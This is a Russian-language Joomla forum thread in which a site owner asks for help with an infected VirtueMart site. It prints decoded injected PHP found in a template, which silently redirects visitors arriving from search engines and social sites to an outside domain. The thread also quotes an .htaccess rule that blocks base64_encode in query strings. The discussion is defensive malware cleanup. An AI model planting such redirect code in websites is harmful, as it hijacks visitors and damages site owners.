Облачный сервис для Joomla сайтов
Навигация: Главная Форум

Добро пожаловать, Гость
Пожалуйста Вход или Регистрация.    Забыли пароль?

Ошибка HTTP 500 +VM 2.0 безопасность.
(1 чел.) (1) Гость
ВнизСтраница: 12
Сообщения темы: Ошибка HTTP 500 +VM 2.0 безопасность.
#5818
Ошибка HTTP 500 +VM 2.0 безопасность. 4 г., 9 мес. назад Репутация: 7
Беда, благо я проверяю все файлы что лью на сайт антивирусом. У меня нитак давно тоже была проблема с одним компонентом, он мне снес язык на сайте и стили шаблонов. Кстати даже брал с премиум доступа - компонент купонов.
Проблема была решена бекапом сайта.
Zudva
Постов: 135
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
 
#5830
Ошибка HTTP 500 +VM 2.0 безопасность. 4 г., 9 мес. назад Репутация: 0
Чеми проверяли базу то? Поделитесь.
Phantosmagor
Постов: 16
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
 
#5850
Ошибка HTTP 500 +VM 2.0 безопасность. 4 г., 9 мес. назад Репутация: 4
Руки + голова + phpMyAdmin
ищи шифрованный код это первое что надо сделать.
В шаблоне, в модулях, в плагинах.

Поставь денвер на него закинь свой бэкап и там день и ночь ищи!
MarioN888
Постов: 37
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Страна, город: Украина
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
 
#6061
Ошибка HTTP 500 +VM 2.0 безопасность. 4 г., 8 мес. назад Репутация: 0
Дешифровал код вируса

Код:



error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta")  or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/ ",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://lpistw.4pu.com/");
exit();
}
}
}
}
}



всёравно не понимаю, что он делает, и как лечить, базу PHP MyAdminом просмотрел, подозрительного ничего не нашёл... Все ненужные модули удалены, остались наиболее важные.

Upd. смысл то понятен... ( если переходить с указанных выше поисковиков) на сайт- попадёшь на lpistw.4pu.com , вместо целевого

НО
1)http://www.suzdalini.ru/kak-udalit-virus-s-sajta.html - прочитано, как и похожие статьи...
2)Удалять постоянно вредоносный код с сайта - это страшное не комильфо, возникает вопрос, поможет ли "775" выставленное..
3)Немогу найти причину заражения , т.к не знаю где.. в базе нет ничего подозрительного.
Phantosmagor
Постов: 16
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Последнее редактирование: 28.10.2012 00:57 Редактировал Phantosmagor.
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
 
#6069
Ошибка HTTP 500 +VM 2.0 безопасность. 4 г., 8 мес. назад Репутация: 4
Дело все в том что этот код был изначально в шаблоне.
Когда ты его нашел. Это здорово!
Удали его и будет тебе счастье.
Когда ты восстанавливался из бэкапа то этот код был все еще там.
Поэтому у тебя бы неприятности.
MarioN888
Постов: 37
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Страна, город: Украина
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
 
#6073
Ошибка HTTP 500 +VM 2.0 безопасность. 4 г., 8 мес. назад Репутация: 0
Вопрос в удалении - это конечно да, мол перестало пахать/хостер написал о вирусе , замени живыми файлами или вычисти те , это круто, но!

Дыру найти хочется. Перелопатил сегодня полностью весь бэкап ( все .php и .css +смотрел нет ли странных файлов типа xxx.php.png).


Upd 28.10.2012 21:00
Странно, кстати, что вообще эксплойты работают, в .htaccess:

Код:



RewriteEngine On


# Block out any script trying to base64_encode data within the URL.
RewriteCond %{QUERY_STRING} basе64_encode[^(]*\([^)]*\) [OR] 

Phantosmagor
Постов: 16
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Последнее редактирование: 28.10.2012 20:10 Редактировал Phantosmagor.
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
 
ВверхСтраница: 12
Модераторы: Fidelity, Nikolia, cvetercom, Xemreht, mr.Hi-End
получить последние сообщения прямо на Ваш рабочий стол
Баннер
Pool Snooker Billiards Graphite Cue Stick firm Radicura Enterprises varied line up of International Brands in allied fields. Proprietor Amit Jain being an expert in branding activities actively solicits global partnerships to commit worldwide trade sport equipment goods distributor dealer supplier importer exporter trader consultant franchise shop E-Commerce Website Designing, Development, Hosting, SEO & Online/Offline Advertising ~ Goods Warehousing, Preparation, Logistics & Worldwide Customs Clearances ~ Joint Venture Liaisons for Real Estate, Finance, Insurance, Distribution & Manufacturing